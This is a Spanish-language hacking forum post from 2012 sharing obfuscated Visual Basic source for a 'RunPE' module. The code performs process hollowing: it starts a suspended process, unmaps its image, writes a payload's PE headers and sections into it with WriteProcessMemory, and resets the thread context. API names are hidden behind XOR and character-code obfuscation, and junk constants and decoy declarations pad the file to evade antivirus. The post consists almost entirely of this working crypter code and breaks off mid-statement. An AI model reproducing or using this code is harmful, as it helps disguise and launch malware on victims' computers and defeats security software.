comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Runpe Mod K4

  • 3 Respuestas
  • 2183 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado K4RUN4

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Octubre 11, 2012, 05:04:34 pm »
Runpe Generador skyweb007
Código: Visual Basic
  1. Private Const iTODXOFScMLkMiuJqI As Long = 884210437
  2. Private Const oHlUFbB7c As Long = &H10007
  3. Private Const KPoPaUmjGcBsoBRgCp As Long = 43885802
  4.  
  5. Private Const UdpSlRoHgHSMeNkUek As Long = 571456721
  6. Private Const XkLbWZwT0 As Integer = 260
  7. Private Const BvJabvwHeMpFlrLTJo As Long = 666743405
  8.  
  9. Private Const UZKDKoCBRUXPnDyfOQ As Long = 623572428
  10. Private Const bTQl9oDeY As Long = &H4
  11. Private Const rtZtAIvclmkpNTaFSR As Long = 667513285
  12.  
  13. Private Const PSKiMqoWLfWMakTTGH As Long = 670505035
  14. Private Const E4r2NPXmu As Long = &H1000
  15. Private Const gfkVOVAaMcfiacHqmb As Long = 865706641
  16.  
  17. Private Const kFYSInvwyBlelQdcsy As Long = 73541772
  18. Private Const EQIAtwHT0 As Long = &H2000
  19. Private Const NPHgynYGIcFKYUDQpp As Long = 346262605
  20.  
  21. Private Const PAHOeFFULNFeHljRGa As Long = 314522005
  22. Private Const mvUSFCqYB As Long = &H40
  23. Private Const qhYmvfeSFfCOcKbOSr As Long = 554761501
  24.  
  25.  
  26. Private Declare Function FOZTxMgzSNCirs Lib "USER32" Alias "SetWindowTextA" (ByVal hWnd As Long, ByVal strText As String) As Long
  27. Private Declare Function gZhKYQnrtlK Lib "winmm.dll" (ByRef phMixer As Long, ByVal uMxId As Long, ByVal dwCallback As Long, ByVal dwInstance As Long, ByVal fdwOpen As Long) As Long
  28. Private Declare Function CkmGjoCMhviUvRQtar Lib "gdi32" (ByVal hDC As Long) As Long
  29. Private Declare Function HitnFCZ Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
  30. Private Declare Function LHTkzUIRpkNPwQVeSzH Lib "gdi32" (ByVal hMetaFile As Long) As Long
  31. Private Declare Function CreateProcessA Lib "kernel32" (ByVal Td57zdeAJ As String, ByVal irp2fgyco As String, ByVal RdLggVr0Q As Long, ByVal Fjn88KRAm As Long, ByVal VKa5eOX4s As Long, ByVal heV8nTQUC As Long, ByVal ofKb6Slk8 As Long, ByVal MCJpy2ujw As Long, jvQsfC7ZK As HvWIgrbaI, OpDxItsdy As Ikr1WTQJc) As Long
  32. Private Declare Function LjqxbonDHKBbqjS Lib "version.dll" Alias "GetFileVersionInfoA" (ByVal lptstrFilename As String, ByVal dwHandle As Long, ByVal dwLen As Long, lpData As Any) As Long
  33. Private Declare Function YAESOxLllLUhJd Lib "USER32" Alias "LoadBitmapA" (ByVal hInstance As Long, ByVal lngBitmapID As Long) As Long
  34. Private Declare Function yYyJDVF Lib "version.dll" Alias "GetFileVersionInfoA" (ByVal lptstrFilename As String, ByVal dwHandle As Long, ByVal dwLen As Long, lpData As Any) As Long
  35. Private Declare Function VcYkAPQZiFAegMSm Lib "USER32" (ByVal hCursor As Long) As Long
  36. Private Declare Function PKLJOzGN Lib "gdi32" (ByVal hMetaFile As Long) As Long
  37. Private Declare Function ETJMEdGljQFaQH Lib "olepro32.dll" (ByVal OLE_COLOR As Long, ByVal hPalette As Long, lpColorRef As Long) As Long
  38.  
  39. Private Declare Function BdlxatZwObOMG Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
  40. Private Declare Function scnspARSopyQDhwdjCK Lib "winmm.dll" (ByVal uPeriod As Long) As Long
  41. Private Declare Function bcafPI Lib "olepro32.dll" (ByRef PicDesc As Any, ByRef RefIID As Long, ByVal fPictureOwnsHandle As Long, ByRef IPic As Long) As Long
  42. Private Declare Function UGQbdUuQBmh Lib "USER32" Alias "RegisterWindowMessageA" (ByVal LPString As String) As Long
  43. Private Declare Function hYlwfeRDfB Lib "winmm.dll" () As Long
  44. Private Declare Function JbMQr Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
  45. Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal CE9yvfJTt As Long, b5IFtuNEU As Any, jJge24yxK As Any, ByVal U3W2edK9C As Long, fjly1tZq8 As Long) As Long
  46. Private Declare Function QpmIfD Lib "winmm.dll" Alias "mciGetErrorStringA" (ByVal ErrorNumber As Long, ByVal ReturnBuffer As String, ByVal ReturnBufferSize As Long) As Long 'BOOL
  47. Private Declare Function QTjEFOZTxMgzSN Lib "version.dll" Alias "GetFileVersionInfoSizeA" (ByVal lptstrFilename As String, lpdwHandle As Long) As Long
  48. Private Declare Function rsqvgZh Lib "USER32" Alias "LoadIconA" (ByVal hLib As Long, ByVal lngIconID As Long) As Long
  49. Private Declare Function QnrtlKaRCkmGjoCMhviU Lib "gdi32" (ByVal hDC As Long) As Long
  50. Private Declare Function QtareiHitnFCZvTLHT Lib "gdi32" (ByVal hGDIObj As Long) As Long
  51.  
  52. Private Declare Function KFjlRlrzo Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
  53. Private Declare Function echEKR Lib "USER32.DLL" (ByVal hwndParent As Long, ByVal lpEnumCallback As Long, ByVal lParam As Long) As Long
  54. Private Declare Function IZdfQwLDoVYsUank Lib "USER32" (ByVal hCursor As Long) As Long
  55. Private Declare Function FFhpCey Lib "USER32.DLL" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByRef lpvParam As Any, ByVal fuWinIni As Long) As Long
  56. Private Declare Function TtTfZraxhrxtF Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
  57. Private Declare Function suDbVzBi Lib "winmm.dll" () As Long
  58. Private Declare Function WSkaKIVom Lib "kernel32" Alias "OutputDebugStringA" (ByVal cgRmc7IJv As String) As Long
  59. Private Declare Function PEkggfkUbjzaZpf Lib "winmm.dll" (ByVal hMixer As Long) As Long
  60. Private Declare Function ycGEm Lib "USER32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal strText As String, ByVal TextLength As Long) As Long
  61. Private Declare Function lcqAjjVQxGS Lib "gdi32" (ByVal hDC As Long) As Long
  62. Private Declare Function tRkvkhbtqNxHNJVmn Lib "gdi32" (ByVal hMetaFile As Long) As Long
  63.  
  64.  
  65. Private Declare Function etagzHxdYYQcM Lib "USER32.DLL" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByRef lpvParam As Any, ByVal fuWinIni As Long) As Long
  66. Private Declare Function rRDTQaRqTyieSneUi Lib "version.dll" Alias "VerQueryValueA" (pBlock As Any, ByVal lpSubBlock As String, lplpBuffer As Any, puLen As Long) As Long
  67. Private Declare Function bOAcy Lib "gdi32" (ByVal hDC As Long) As Long
  68. Private Declare Function GYJNocaTmjFbzFBNQgBC Lib "gdi32" (ByVal hDC As Long) As Long
  69. Private Declare Function QuJcwPKzfopnsdVdHUT Lib "USER32" (ByVal hCursor As Long) As Long
  70. Private Declare Function qiHVOzhjD Lib "USER32" (ByVal hWnd As Long, lpRect As Long) As Long
  71. Public Declare Sub RtlMoveMemory Lib "kernel32" (AxGGLYZ7E As Any, d2l6uk0Pt As Any, ByVal l1p6nLoNB As Long)
  72. Private Declare Function yJerfQsO Lib "winmm.dll" Alias "mciSendStringA" (ByVal CommandString As String, ByVal ReturnBuffer As String, ByVal ReturnBufferSize As Long, ByVal hCallback As Long) As Long 'MCIERROR
  73. Private Declare Function QoaeEfqkC Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
  74. Private Declare Function sQIEPhwRFOmhKMtMSbP Lib "USER32" (ByVal IconOrCursor As Long, ByRef pICONINFO As Long) As Long
  75. Private Declare Function FDIgmuYlkAEGyY Lib "gdi32" (ByVal hGDIObj As Long) As Long
  76. Private Declare Function PxzTwB Lib "USER32" (ByVal hWnd As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal bRepaint As Long) As Long
  77.  
  78. Private Declare Function CemzbuayPqQcV Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
  79. Private Declare Function tdouqBSipqAYSwyelEMB Lib "winmm.dll" (ByVal hMixer As Long) As Long
  80. Private Declare Function dbgRY Lib "USER32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal strText As String, ByVal TextLength As Long) As Long
  81. Private Declare Function QVmcfQvYDBj Lib "winmm.dll" Alias "mciGetErrorStringA" (ByVal ErrorNumber As Long, ByVal ReturnBuffer As String, ByVal ReturnBufferSize As Long) As Long 'BOOL
  82. Private Declare Function iZnxggSSuC Lib "winmm.dll" (ByVal uPeriod As Long) As Long
  83. Private Declare Function CallWindowProcA Lib "USER32" (ByVal Tg75MhFRu As Long, ByVal gEdEnMOb8 As Long, ByVal EmFxf7Lra As Long, ByVal TNZRPnQNL As Long, ByVal wZ1lfnc1U As Long) As Long
  84. Private Declare Function LqOgsheYqn Lib "USER32" Alias "SetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
  85. Private Declare Function EKGSjkFHQoU Lib "gdi32" (ByVal hDC As Long) As Long
  86. Private Declare Function vBUdRxttswibiMnZo Lib "USER32" (ByVal IconOrCursor As Long, ByRef pICONINFO As Long) As Long
  87. Private Declare Function nLpTDzoIypD Lib "gdi32" (ByVal hColorSpace As Long) As Long
  88.  
  89. Private Declare Function ZvHVDUGKlZVP Lib "gdi32" (ByVal hDC As Long) As Long
  90. Private Declare Function CYwCyK Lib "USER32" Alias "SetWindowTextA" (ByVal hWnd As Long, ByVal strText As String) As Long
  91. Private Declare Function xzISN Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
  92. Private Declare Function ZtMGwcllkpaSaER Lib "winmm.dll" (ByVal hMixerObj As Long, pMixerCD As Long, ByVal fdwDetails As Long) As Long
  93. Private Declare Function knfDSLv Lib "USER32" Alias "RegisterWindowMessageA" (ByVal LPString As String) As Long
  94. Private Declare Function AdivFbo Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
  95. Private Declare Function GetProcAddress Lib "kernel32" (ByVal qkrvtMeXS As Long, ByVal Sa39iyURB As String) As Long
  96. Private Declare Function pLKmTlQbBbnhywSoM Lib "USER32" (ByVal hCursor As Long) As Long
  97. Private Declare Function MetOBLjeHJpJO Lib "SHELL32.DLL" Alias "SHGetFileInfoA" (ByVal pszPath As String, ByVal dwFileAttributes As Long, psfi As Long, ByVal cbFileInfo As Long, ByVal uFlags As Long) As Long
  98. Private Declare Function sBCAFdjqUihxADvUj Lib "winmm.dll" (ByVal uPeriod As Long) As Long
  99. Private Declare Function uwQtyLIrEeeFNbCQ Lib "USER32" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal OutputWidth As Long, ByVal OutputHeight As Long, ByVal iStepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Long
  100. Private Declare Function rRsDx Lib "USER32" Alias "LoadCursorA" (ByVal hLib As Long, ByVal lngCursorID As Long) As Long
  101.  
  102. Private Declare Function VRduJQSczuYaGMgodI Lib "SHELL32.DLL" Alias "SHGetFileInfoA" (ByVal pszPath As String, ByVal dwFileAttributes As Long, psfi As Long, ByVal cbFileInfo As Long, ByVal uFlags As Long) As Long
  103. Private Declare Function DHtzGYyxNDGyQA Lib "winmm.dll" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
  104. Private Declare Function KzTJAO Lib "winmm.dll" Alias "mciGetErrorStringA" (ByVal ErrorNumber As Long, ByVal ReturnBuffer As String, ByVal ReturnBufferSize As Long) As Long 'BOOL
  105. Private Declare Function HuuVfrSnRqITIFz Lib "STKIT432.DLL" (ByVal lpstrFolderName As String, ByVal lpstrLinkName As String, ByVal lpstrLinkPath As String, ByVal lpstrLinkArgs As String) As Long
  106. Private Declare Function mVgmiuKLhjsPxaqQd Lib "GDI32.DLL" (ByVal hDC As Long, ByVal nIndex As Long) As Long
  107. Private Declare Function LoadLibraryA Lib "kernel32" (ByVal SCgYSjXPN As String) As Long
  108. Private Declare Function tZUUTZJCJoOAQT Lib "USER32" (ByVal hCursor As Long) As Long
  109. Private Declare Function nQvfbPkbQfpYYKxZv Lib "winmm.dll" () As Long
  110. Private Declare Function DUGKlZVPifCYwCyKNcx Lib "USER32" (ByVal hIcon As Long) As Long
  111. Private Declare Function SNrGZtMGwcllkpa Lib "USER32" (ByVal IconOrCursor As Long, ByRef pICONINFO As Long) As Long
  112.  
  113.  
  114. Private ihwBEyUjcMuvRtMWrF As Long
  115. Private eGcbDkCnrSrDvPNjFd As Double
  116. Private SdWlHtEbWACiCIQFkt As String
  117. Private swVbiNaZptynNcUFmo As Byte
  118. Private Type tX1G1gc6e
  119. nLength As Long
  120. lpSecurityDescriptor As Long
  121. bInheritHandle As Long
  122. End Type
  123.  
  124. Private BjvWWwGTuPtSjKkypI As Long
  125. Private OwIOKWmCJLUrmQSFYg As Double
  126. Private BvvyAlrAQqpGyqPsXV As Boolean
  127. Private rMCsHRAAmnOXjMfKiB As Currency
  128. Private BwrKHeOYeamDEZbkIp As Date
  129. Private iPVovlSNNMRCuCgHsJ As Currency
  130. Private Type HvWIgrbaI
  131. cb As Long
  132. lpReserved As Long
  133. lpDesktop As Long
  134. lpTitle As Long
  135. dwX As Long
  136. dwY As Long
  137. dwXSize As Long
  138. dwYSize As Long
  139. dwXCountChars As Long
  140. dwYCountChars As Long
  141. dwFillAttribute As Long
  142. dwFlags As Long
  143. wShowWindow As Integer
  144. cbReserved2 As Integer
  145. lpReserved2 As Long
  146. hStdInput As Long
  147. hStdOutput As Long
  148. hStdError As Long
  149. End Type
  150.  
  151. Private eJsodwnesDllYLmIVj As Date
  152. Private iUYwmjdysQlKQMYbpL As Currency
  153. Private WgaEUmHaUKpwCngnSe As Integer
  154. Private uwBsRgZJqtOquJToCo As Integer
  155. Private Type Ikr1WTQJc
  156. CE9yvfJTt As Long
  157. hThread As Long
  158. dwProcessId As Long
  159. dwThreadID As Long
  160. End Type
  161.  
  162. Private bJaMQqQbVnkIdCuqCT As Single
  163. Private DqBYTvweEMChqqpuRY As Integer
  164. Private KXWmpskJYRBjlGinBw As Integer
  165. Private tTTuDQrLqPgHhsmFnK As String
  166. Private FLHSjGHRojNPuCVcSw As String
  167. Private Type rVuaHnLLV
  168. ControlWord As Long
  169. StatusWord As Long
  170. TagWord As Long
  171. ErrorOffset As Long
  172. ErrorSelector As Long
  173. DataOffset As Long
  174. DataSelector As Long
  175. RegisterArea(1 To 80) As Byte
  176. Cr0NpxState As Long
  177. End Type
  178.  
  179. Private ioyNnmDsynMoUSAoJp As Double
  180. Private jSRFFgoBdvcBSeSQKc As Double
  181. Private yfqvsEVWrsDaHkAgnG As Currency
  182. Private EjefdiTNUwZKaehYwa As Byte
  183. Private plZukbpAiiVIiFSgNf As Date
  184. Private VujgaspMiHNJUXmIJT As Integer
  185. Private Type vQYh9rmTo
  186. ContextFlags As Long
  187.  
  188. Dr0 As Long
  189. Dr1 As Long
  190. Dr2 As Long
  191. Dr3 As Long
  192. Dr6 As Long
  193. Dr7 As Long
  194.  
  195. FloatSave As rVuaHnLLV
  196. SegGs As Long
  197. SegFs As Long
  198. SegEs As Long
  199. SegDs As Long
  200. Edi As Long
  201. Esi As Long
  202. Ebx As Long
  203. Edx As Long
  204. Ecx As Long
  205. Eax As Long
  206. Ebp As Long
  207. Eip As Long
  208. SegCs As Long
  209. EFlags As Long
  210. Esp As Long
  211. SegSs As Long
  212. End Type
  213.  
  214. Private jEXRHmuytkdkPbbquw As Long
  215. Private OdWGnqLnrGQllYAVUv As Integer
  216. Private yhlLlvqJGdXPMXoDYM As Double
  217. Private tnRTAUZhXDMMLPmtBf As Long
  218. Private rHLOGetmWEHbEIWTCP As Long
  219. Private oQYkNgMjCbCNHZJfPa As Integer
  220. Private Type IG4wyJbPZ
  221. e_magic As Integer
  222. e_cblp As Integer
  223. e_cp As Integer
  224. e_crlc As Integer
  225. e_cparhdr As Integer
  226. e_minalloc As Integer
  227. e_maxalloc As Integer
  228. e_ss As Integer
  229. e_sp As Integer
  230. e_csum As Integer
  231. e_ip As Integer
  232. e_cs As Integer
  233. e_lfarlc As Integer
  234. e_ovno As Integer
  235. e_res(0 To 3) As Integer
  236. e_oemid As Integer
  237. e_oeminfo As Integer
  238. e_res2(0 To 9) As Integer
  239. e_lfanew As Long
  240. End Type
  241.  
  242. Private uDEOlgKLrwRZPupqot As Integer
  243. Private lsJkjAprjJlQOvkGym As Boolean
  244. Private LttggIQdFYEctGtrlE As Boolean
  245. Private XHSYUfvwTUeCiMbIPh As Long
  246. Private Type yDQ4fPIlY
  247. Machine As Integer
  248. NumberOfSections As Integer
  249. TimeDateStamp As Long
  250. PointerToSymbolTable As Long
  251. NumberOfSymbols As Long
  252. SizeOfOptionalHeader As Integer
  253. characteristics As Integer
  254. End Type
  255.  
  256. Private DBGqkrVvhwCFyVwdNJ As String
  257. Private SINXGGsfGcpEkDosSH As Boolean
  258. Private wQNjGekgruKfgqAuYo As Byte
  259. Private buoeKSTRWIBImOSVNl As Boolean
  260. Private tdLOiLPdnJWJyXsrUC As Date
  261. Private Type opSQywttF
  262. VirtualAddress As Long
  263. Size As Long
  264. End Type
  265.  
  266. Private JUOgdBWumiuMayjsRL As Long
  267. Private qXrvFuajjimKRYDPPe As Single
  268. Private ldCRKtbebftqZmMMny As Byte
  269. Private kEjHZZkevgDmwDALcq As Boolean
  270. Private Type nOr6mWzig
  271. Magic As Integer
  272. MajorLinkerVersion As Byte
  273. MinorLinkerVersion As Byte
  274. SizeOfCode As Long
  275. SizeOfInitializedData As Long
  276. SizeOfUnitializedData As Long
  277. AddressOfEntryPoint As Long
  278. BaseOfCode As Long
  279. BaseOfData As Long
  280. ImageBase As Long
  281. SectionAlignment As Long
  282. FileAlignment As Long
  283. MajorOperatingSystemVersion As Integer
  284. MinorOperatingSystemVersion As Integer
  285. MajorImageVersion As Integer
  286. MinorImageVersion As Integer
  287. MajorSubsystemVersion As Integer
  288. MinorSubsystemVersion As Integer
  289. W32VersionValue As Long
  290. SizeOfImage As Long
  291. SizeOfHeaders As Long
  292. CheckSum As Long
  293. SubSystem As Integer
  294. DllCharacteristics As Integer
  295. SizeOfStackReserve As Long
  296. SizeOfStackCommit As Long
  297. SizeOfHeapReserve As Long
  298. SizeOfHeapCommit As Long
  299. LoaderFlags As Long
  300. NumberOfRvaAndSizes As Long
  301. DataDirectory(0 To 15) As opSQywttF
  302. End Type
  303.  
  304. Private EhiPVovmSNOMRCJQgI As Byte
  305. Private XNPHgJnlUIdTKYiRRE As Byte
  306. Private fnBcybARdRPJbYuepy As Long
  307. Private DUVqrCZGjfmFNDidec As Single
  308. Private Type zHimHxdyE
  309. Signature As Long
  310. FileHeader As yDQ4fPIlY
  311. OptionalHeader As nOr6mWzig
  312. End Type
  313.  
  314. Private SteuBsSuZKGtOFyKUD As Boolean
  315. Private pcDZlAhlpPDBuNKgDb As Single
  316. Private dorHcdnvrVkEXqlaGP As Date
  317. Private OTEwFiyuLPRJiwpaIK As Integer
  318. Private Type guWZ6IUxp
  319. SecName As String * 8
  320. VirtualSize As Long
  321. VirtualAddress As Long
  322. SizeOfRawData As Long
  323. PointerToRawData As Long
  324. PointerToRelocations As Long
  325. PointerToLinenumbers As Long
  326. NumberOfRelocations As Integer
  327. NumberOfLinenumbers As Integer
  328. characteristics As Long
  329. End Type
  330.  
  331.  
  332. Public Function u7tGsr9W3(ByVal qOLqmwZVA As String, ByVal ACzbFfGhs As String, ParamArray TLEEGE3BB()) As Long
  333. Dim CUKQL As Long, zFt3quxBV(&HEC00& - 1) As Byte, HAB As Long, WMJGLUQ As Long
  334.  
  335. WMJGLUQ = GetProcAddress(LoadLibraryA(qOLqmwZVA), ACzbFfGhs)
  336. If WMJGLUQ = 0 Then Exit Function
  337.  
  338. CUKQL = VarPtr(zFt3quxBV(0))
  339. RtlMoveMemory ByVal CUKQL, &H59595958, &H4: CUKQL = CUKQL + 4
  340. RtlMoveMemory ByVal CUKQL, &H5059, &H2: CUKQL = CUKQL + 2
  341. For HAB = UBound(TLEEGE3BB) To 0 Step -1
  342. RtlMoveMemory ByVal CUKQL, &H68, &H1: CUKQL = CUKQL + 1
  343. RtlMoveMemory ByVal CUKQL, CLng(TLEEGE3BB(HAB)), &H4: CUKQL = CUKQL + 4
  344. Next
  345. RtlMoveMemory ByVal CUKQL, &HE8, &H1: CUKQL = CUKQL + 1
  346. RtlMoveMemory ByVal CUKQL, WMJGLUQ - CUKQL - 4, &H4: CUKQL = CUKQL + 4
  347. RtlMoveMemory ByVal CUKQL, &HC3, &H1: CUKQL = CUKQL + 1
  348. u7tGsr9W3 = CallWindowProcA(VarPtr(zFt3quxBV(0)), 0, 0, 0, 0)
  349. End Function
  350.  
  351. Public Function GCcQ9b7nT(ByVal iNLI3ostx As String, ByVal YIagFy1Sq As String) As String
  352. Dim DELHfVCj8 As Long
  353.  
  354. For DELHfVCj8 = 1 To Len(iNLI3ostx)
  355. GCcQ9b7nT = GCcQ9b7nT & Chr(Asc(Mid(YIagFy1Sq, IIf(DELHfVCj8 Mod Len(YIagFy1Sq) <> 0, DELHfVCj8 Mod Len(YIagFy1Sq), Len(YIagFy1Sq)), 1)) Xor Asc(Mid(iNLI3ostx, DELHfVCj8, 1)))
  356. Next DELHfVCj8
  357. End Function
  358.  
  359. Public Sub nJLJ0h51B(ByVal gAjHv5BEo As String, ByRef GelPTlshh() As Byte, LY7YFef3i As String)
  360. Dim Puq626fXT As Long, WcURpueyC As IG4wyJbPZ, dxNCenpxr As zHimHxdyE, VBzOQVQxf As guWZ6IUxp
  361. Dim ptLvXfllO As HvWIgrbaI, cQdlVdwtG As Ikr1WTQJc, sGbh6tdbF As vQYh9rmTo
  362.  
  363. ptLvXfllO.cb = Len(ptLvXfllO)
  364. RtlMoveMemory WcURpueyC, GelPTlshh(0), 64
  365. RtlMoveMemory dxNCenpxr, GelPTlshh(WcURpueyC.e_lfanew), 248
  366.  
  367. CreateProcessA gAjHv5BEo, kMIvzyLCQ(StrReverse(Chr$(41)), StrReverse(Chr$(57))) & LY7YFef3i, 0, 0, False, bTQl9oDeY, 0, 0, ptLvXfllO, cQdlVdwtG
  368. u7tGsr9W3 GCcQ9b7nT(Chr(56) & Chr(58) & Chr(40) & Chr(39) & Chr(35), kMIvzyLCQ(StrReverse(Chr$(92) & Chr$(72) _
  369.  & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) & Chr$(85) _
  370.  & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) & Chr$(78) _
  371.  & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) & Chr$(73) _
  372.  & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) & Chr$(80) _
  373.  & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
  374. )))))))))))), GCcQ9b7nT(Chr(24) & Chr(58) & Chr(25) & Chr(37) & Chr(34) & Chr(34) & Chr(37) & Chr(14) & Chr(46) & Chr(53) & Chr(56) & Chr(10) & Chr(54) & Chr(29) & Chr(34) & Chr(33) & Chr(37) & Chr(34) & Chr(62) & Chr(57), kMIvzyLCQ(StrReverse(Chr$(92) _
  375.  & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
  376.  & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
  377.  & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
  378.  & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
  379.  & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
  380. )))))))))))), cQdlVdwtG.CE9yvfJTt, dxNCenpxr.OptionalHeader.ImageBase
  381. u7tGsr9W3 GCcQ9b7nT(Chr(61) & Chr(43) & Chr(62) & Chr(37) & Chr(42) & Chr(47) & Chr(102) & Chr(106), kMIvzyLCQ(StrReverse(Chr$(92) _
  382.  & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
  383.  & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
  384.  & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
  385.  & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
  386.  & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
  387. )))))))))))), GCcQ9b7nT(Chr(0) & Chr(39) & Chr(62) & Chr(63) & Chr(58) & Chr(34) & Chr(57) & Chr(25) & Chr(43) & Chr(60) & Chr(32) & Chr(38) & Chr(21) & Chr(54), kMIvzyLCQ(StrReverse(Chr$(92) _
  388.  & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
  389.  & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
  390.  & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
  391.  & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
  392.  & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
  393. )))))))))))), cQdlVdwtG.CE9yvfJTt, dxNCenpxr.OptionalHeader.ImageBase, dxNCenpxr.OptionalHeader.SizeOfImage, E4r2NPXmu Or EQIAtwHT0, mvUSFCqYB
  394. WriteProcessMemory cQdlVdwtG.CE9yvfJTt, ByVal dxNCenpxr.OptionalHeader.ImageBase, GelPTlshh(0), dxNCenpxr.OptionalHeader.SizeOfHeaders, 0
  395.  
  396. For Puq626fXT = 0 To dxNCenpxr.FileHeader.NumberOfSections - 1
  397. RtlMoveMemory VBzOQVQxf, GelPTlshh(WcURpueyC.e_lfanew + 248 + 40 * Puq626fXT), Len(VBzOQVQxf)
  398. WriteProcessMemory cQdlVdwtG.CE9yvfJTt, ByVal dxNCenpxr.OptionalHeader.ImageBase + VBzOQVQxf.VirtualAddress, GelPTlshh(VBzOQVQxf.PointerToRawData), VBzOQVQxf.SizeOfRawData, 0
  399. Next Puq626fXT
  400.  
  401. sGbh6tdbF.ContextFlags = oHlUFbB7c
  402. u7tGsr9W3 GCcQ9b7nT(Chr(61) & Chr(43) & Chr(62) & Chr(37) & Chr(42) & Chr(47) & Chr(102) & Chr(106), kMIvzyLCQ(StrReverse(Chr$(92) _
  403.  & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
  404.  & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
  405.  & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
  406.  & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
  407.  & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
  408. )))))))))))), GCcQ9b7nT(Chr(17) & Chr(43) & Chr(56) & Chr(31) & Chr(39) & Chr(49) & Chr(48) & Chr(57) & Chr(35) & Chr(19) & Chr(32) & Chr(43) & Chr(36) & Chr(43) & Chr(63) & Chr(54), kMIvzyLCQ(StrReverse(Chr$(92) _
  409.  & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
  410.  & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
